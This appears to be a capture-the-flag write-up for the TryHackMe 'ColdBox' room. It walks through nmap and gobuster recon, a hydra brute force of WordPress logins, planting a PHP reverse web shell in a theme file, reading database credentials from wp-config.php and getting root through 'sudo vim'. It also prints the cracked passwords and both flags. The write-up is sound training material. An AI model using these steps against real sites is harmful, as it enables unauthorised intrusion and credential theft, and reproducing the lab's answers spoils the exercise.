# ColdBox

https://tryhackme.com/room/colddboxeasy

🔗 [ColdBox](https://tryhackme.com/room/colddboxeasy) ### Task 1 - Deploy the machine 🎯 Target IP: `10.10.100.105` Create a directory for machine on the Desktop and a directory containing the scans with nmap. ### Task 2 - Reconnaissance 
su
echo "10.10.100.105 coldbox.thm" >> /etc/hosts

mkdir thm/coldbox.thm
cd thm/coldbox.thm
mkdir {nmap,content,exploits,scripts}

# At the end of the room
# To clean up the last line from the /etc/hosts file
sed -i '$ d' /etc/hosts
I prefer to start recon by pinging the target, this allows us to check connectivity and get OS info. ```bash ping -c 3 coldbox.thm PING coldbox.thm (10.10.100.105) 56(84) bytes of data. 64 bytes from coldbox.thm (10.10.100.105): icmp_seq=1 ttl=63 time=65.4 ms 64 bytes from coldbox.thm (10.10.100.105): icmp_seq=2 ttl=63 time=61.1 ms 64 bytes from coldbox.thm (10.10.100.105): icmp_seq=3 ttl=63 time=60.5 ms ``` Sending these three ICMP packets, we see that the Time To Live (TTL) is \~64 secs. this indicates that the target is a \*nix, while Windows systems usually have a TTL of 128 secs. Of course, start to check information scanning open ports: ```bash nmap --open -p0- -n -Pn -vvv --min-rate 5000 coldbox.thm -oG nmap/port_scan ``` ```bash PORT STATE SERVICE REASON 80/tcp open http syn-ack ttl 63 4512/tcp open unknown syn-ack ttl 63 ```
commandresult
sudorun as root
sCrun default scripts
sVenumerate versions
Aaggressive mode
T4run a bit faster
oNoutput to file with nmap formatting
It looks like there are 2 open ports on the machine: 80, 4512 Now, we need to search which services are running on open ports: ```bash nmap -p80,4512 -n -Pn -vvv -sCV --min-rate 5000 coldbox.thm -oN nmap/open_port ``` ```bash PORT STATE SERVICE REASON VERSION 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu)) |_http-title: ColddBox | One more machine |_http-generator: WordPress 4.1.31 |_http-server-header: Apache/2.4.18 (Ubuntu) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS 4512/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 4e:bf:98:c0:9b:c5:36:80:8c:96:e8:96:95:65:97:3b (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDngxJmUFBAeIIIjZkorYEp5ImIX0SOOFtRVgperpxbcxDAosq1rJ6DhWxJyyGo3M+Fx2koAgzkE2d4f2DTGB8sY1NJP1sYOeNphh8c55Psw3Rq4xytY5u1abq6su2a1Dp15zE7kGuROaq2qFot8iGYBVLMMPFB/BRmwBk07zrn8nKPa3yotvuJpERZVKKiSQrLBW87nkPhPzNv5hdRUUFvImigYb4hXTyUveipQ/oji5rIxdHMNKiWwrVO864RekaVPdwnSIfEtVevj1XU/RmG4miIbsy2A7jRU034J8NEI7akDB+lZmdnOIFkfX+qcHKxsoahesXziWw9uBospyhB | 256 88:17:f1:a8:44:f7:f8:06:2f:d3:4f:73:32:98:c7:c5 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKNmVtaTpgUhzxZL3VKgWKq6TDNebAFSbQNy5QxllUb4Gg6URGSWnBOuIzfMAoJPWzOhbRHAHfGCqaAryf81+Z8= | 256 f2:fc:6c:75:08:20:b1:b2:51:2d:94:d6:94:d7:51:4f (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIE/fNq/6XnAxR13/jPT28jLWFlqxd+RKSbEgujEaCjEc Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` ### Task 3 - User flag? Then we can start to see website (port 80):
we can see that's a wordpress web site, then we can try to see page source for checking information disclosure.
but we don't find precious info. Another good thing to do, is find hidden paths on website using gobuster ``` gobuster dir -u coldbox.thm -w /usr/share/wordlists/dirb/common.txt ```
Very good, we can start to check these web dir: /hidden/
Very good, there're precious info about usernames: C0ldd, Hugo and Philip. We can confirm it watching error message at login in a default login path for wordpress: /wp-admin/
Finally the's another good info
If we don't waste time, we can use wpscan to find user list, but we'll take it if we take results with our three users, then try to login with C0ldd/Hugo/Philip:password123 (what we've see in the hidden path). Nothing to do, we need to use brute force attack. Then, we save them in a file called users.txt, and run hydra with a password wordlist to take a brute force attack: ```bash echo "C0ldd\nHugo\nPhilip" > users.txt hydra -L users.txt -P /usr/share/wordlists/rockyou.txt coldbox.thm -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' ```
{% hint style="info" %} C0ldd:9876543210 {% endhint %} Now we can use this credentials to log in wordpress and ssh.
Check user list, to see them and theirs role/permissions:
Very good, C0ldd is administrator. Now, we need to access at machine using web shell, find it on our kali web-shells folder or use pentester monkey website:
We need to edit it using our credentials (LHOST and LPORT):
and upload it on media library page:
But, trying to change extension, upload doesn't work.
Then, we can try to use wordpress themes or plugins how vector to inject our web-shell. Starting with themes, we edit header.php page in the twentyfifteen theme using the same php web-shell:
Update file, run netcat listener on the same port '1234':
Go to:
We can upgrade this to a fully interactive shell by running: ```bash python3 -c 'import pty; pty.spawn("/bin/bash")' export TERM=xterm ``` and retrieve credentials inside wp-config.php file. ```bash cat /var/www/html/wp-config.php | grep "DB_USER" #define('DB_USER', 'c0ldd'); cat /var/www/html/wp-config.php | grep "DB_PASSWORD" #define('DB_PASSWORD', 'cybersecurity'); su c0ldd #inser psw and read flag. ``` we know credential for access how c0ldd user and read user.txt flag
🚩 Flag 1 (user.txt) RmVsaWNpZGFkZXMsIHByaW1lciBuaXZlbCBjb25zZWd1aWRvIQ==
### Task 4 - Root flag? We can do sudo -l command to discover user's permissions.
We see that c0ldd user has root permissions for these commands, we can use gtfobins to find them. using vim sudo command below, we obtain a root permission: ```bash sudo vim -c ':!/bin/sh' ```
spawn /bin/sh to use shell:
Well done! Root flag found!
🚩 Flag 2 (root.txt) wqFGZWxpY2lkYWRlcywgbcOhcXVpbmEgY29tcGxldGFkYSE=